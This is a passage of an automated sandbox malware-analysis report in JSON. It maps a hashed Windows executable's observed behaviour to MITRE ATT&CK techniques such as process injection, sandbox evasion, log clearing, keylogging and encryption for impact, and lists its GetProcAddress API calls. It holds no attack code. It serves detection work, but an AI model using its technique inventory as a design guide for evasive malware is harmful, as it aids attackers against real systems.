"informative_identifiers_count": 4, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Asynchronous Procedure Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Direct Volume Access", "attck_id": "T1006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1006", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Code Signing Policy Modification", "attck_id": "T1553.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "Process Doppelgänging", "attck_id": "T1055.013", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/013", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Clear Windows Event Logs", "attck_id": "T1070.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Unsecured Credentials", "attck_id": "T1552", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Windows Credential Manager", "attck_id": "T1555.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/004", "informative_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 26}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "malicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Network Share Discovery", "attck_id": "T1135", "attck_id_wiki": "https://attack.mitre.org/techniques/T1135", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Account Discovery", "attck_id": "T1087", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Local Account", "attck_id": "T1087.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087/001", "informative_identifiers_count": 1, "parent": {"technique": "Account Discovery", "attck_id": "T1087", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087"}}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Domain Trust Discovery", "attck_id": "T1482", "attck_id_wiki": "https://attack.mitre.org/techniques/T1482", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Permission Groups Discovery", "attck_id": "T1069", "attck_id_wiki": "https://attack.mitre.org/techniques/T1069", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Exfiltration Over Other Network Medium", "attck_id": "T1011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1011", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Exfiltration Over Alternative Protocol", "attck_id": "T1048", "attck_id_wiki": "https://attack.mitre.org/techniques/T1048", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Account Access Removal", "attck_id": "T1531", "attck_id_wiki": "https://attack.mitre.org/techniques/T1531", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Data Destruction", "attck_id": "T1485", "attck_id_wiki": "https://attack.mitre.org/techniques/T1485", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Endpoint Denial of Service", "attck_id": "T1499", "attck_id_wiki": "https://attack.mitre.org/techniques/T1499", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-615", "type": 2, "relevance": 1, "name": "Can loads assembly that contains the code that is currently executing [Dotnet]", "description": "Found string \"GetExecutingAssembly\" (Indicator: \"GetExecutingAssembly\"; Source: \"00000000-00004088.00000000.303192.00402000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter AddDllDirectory (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter CryptGetDefaultProviderW (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextW (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter CryptGenRandom (UID: 00000000-00004392)\n 